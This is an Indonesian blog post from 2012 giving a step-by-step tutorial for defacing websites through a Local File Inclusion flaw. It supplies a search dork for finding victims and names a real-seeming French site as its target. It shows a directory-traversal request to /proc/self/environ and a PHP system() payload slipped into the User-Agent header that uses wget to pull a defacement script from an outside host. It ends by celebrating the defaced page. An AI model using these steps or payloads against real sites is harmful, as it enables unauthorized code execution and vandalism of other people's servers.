Artikel Terkini

Sunday, September 9, 2012

defacing from local file vulnerability (LFI)

Posted by gboys_flush at 1:01 PM 0 comments
=================================================
./ [+] Title : Defacing From Local File Inclusion Vulnerability (LFI)
./ [+] Author : TeguhMicro
./ [+] Category : Hacking (Defacing)
./ [+] Dork : inurl:.php?page=contact.php
./ [+] Site : http://www.teguhmicro.web.id
=================================================
Udah 2 hari ga update artikel di blog kesayangan. Kali ini saya ingin berbagi sedikit tentang Deface dari bug Local File Inclusion atau yang biasa kita sebut LFI.
Sebelumnya apa itu LFI ? Menurut saya :
“LFI adalah suatu celah yang dimana attacker nantinya akan bisa mengakses dan mengupload file di website tersebut dengan hanya melalui url”
Langsung ke pembahasan.
1. Pertama, kita cari target dulu di google dengan dork :

 inurl:.php?page=contact.php
2. Pada tutorial ini web dengan url : http://www.heng-sieng.fr/heng-sieng.php?page=contact.php menjadi tikus percobaan kita.
3. Setelah membuka url tersebut. Cobalah ganti /heng-sieng.php?page=contact.php menjadi /heng-sieng.php?page=../../../../../../../../../../../proc/self/environ
Sehingga url berubah menjadi :
http://www.heng-sieng.fr/heng-sieng.php?page=../../../../../../../../../../../proc/self/environ
Kemudian tekan enter maka tampilan nya akan seperti ini :
Sekarang target udah ready dan siap untuk kita deface. Tapi bagaimana caranya ? Oke ikutin langkah-langkah saya berikut ini :
4. Jalankan Tamper Data di Mozilla Firefox – Tools => Tamper Data
Keterangan : Buat yang belum ada silahkan di install dulu add-ons nya.
5. Start Tamper dan reload halaman target kita, maka akan muncul tampilan seperti ini :
6. Klik Tamper maka akan muncul form berikut ini seperti pada gambar :
7. Pada Label User-Agent ganti dengan script berikut ini :
<?system(‘wget [url script deface kalian]‘);?>
Contoh :
<?system(‘wget http://snpb.polibatam.ac.id/paper/teguh.php’);?>
Seperti pada gambar :
8. Kemudian klik Ok untuk menlanjutkan. Secara otomatis halaman target kita akan mereload dengan sendirinya.
9. Sekarang kita liat script deface kita tadi. Go to address : http://[patch]/namascriptkita.php or .html
10. Sekarang cobalah buka http://www.heng-sieng.fr/teguh.php. Taraaa. Website has been deface ^_^
Keterangan :
1. <?system(‘wget http://snpb.polibatam.ac.id/paper/teguh.php’);?>
wget : Command untuk mengambil file di server lain
http://snpb.polibatam.ac.id/paper/teguh.php : URL script deface kita
teguh.php : Nama script deface kita yang berextensi .php

Leave a Reply